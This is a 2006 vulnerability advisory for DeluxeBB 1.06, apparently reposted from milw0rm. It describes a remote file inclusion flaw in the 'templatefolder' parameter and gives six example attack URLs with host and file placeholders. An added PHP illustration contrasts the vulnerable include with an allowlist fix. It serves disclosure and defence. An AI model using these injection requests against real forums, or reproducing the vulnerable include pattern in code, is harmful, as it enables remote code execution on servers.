Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.
1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.
Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
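As an added illustration (not DeluxeBB's own code and not part of the advisory), the include pattern the advisory describes next to a hardened version that resolves the template folder through a fixed allowlist and confines the result to the templates directory; the function names, the "$base/templates/<name>/header.php" layout and the allowlist contents are assumptions:

```php
<?php
// Added example, not DeluxeBB's code. Layout and names are assumptions.

// Vulnerable pattern: the request parameter is concatenated straight into
// include, so any local path (or, with allow_url_include=On, a remote URL)
// supplied as templatefolder is loaded and executed.
function render_vulnerable(string $base, array $get): void
{
    $templatefolder = $get['templatefolder'] ?? 'default';
    include $base . '/templates/' . $templatefolder . '/header.php';
}

// Hardened: user input selects an entry from a fixed allowlist; the include
// path is built from the allowlisted name, never from the raw parameter.
const ALLOWED_TEMPLATES = ['default', 'deluxe'];   // assumed template names

function resolve_template_dir(string $base, ?string $requested): string
{
    $name = $requested ?? 'default';
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        // Unknown template: fall back (or log and reject the request).
        $name = 'default';
    }

    // Defence in depth: canonicalise and confirm the directory still lies
    // under the templates root (catches symlinks or a misconfigured base).
    $root = realpath($base . '/templates');
    $dir  = realpath($base . '/templates/' . $name);
    if ($root === false || $dir === false
        || strpos($dir, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template directory outside templates root');
    }
    return $dir;
}

function render_hardened(string $base, array $get): void
{
    $dir = resolve_template_dir($base, $get['templatefolder'] ?? null);
    include $dir . '/header.php';
}
```

Independently of the code fix, keeping allow_url_include (and, where possible, allow_url_fopen) disabled in php.ini removes the remote half of this bug class even if another unvalidated include slips through.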
# milw0rm.com [2006-06-15]
Title: DeluxeBB 1.06 - templatefolder Remote File Inclusion
Reporter: Andreas Sandblad
Published: 2006-06-15
Type: exploitpack (webapps, php)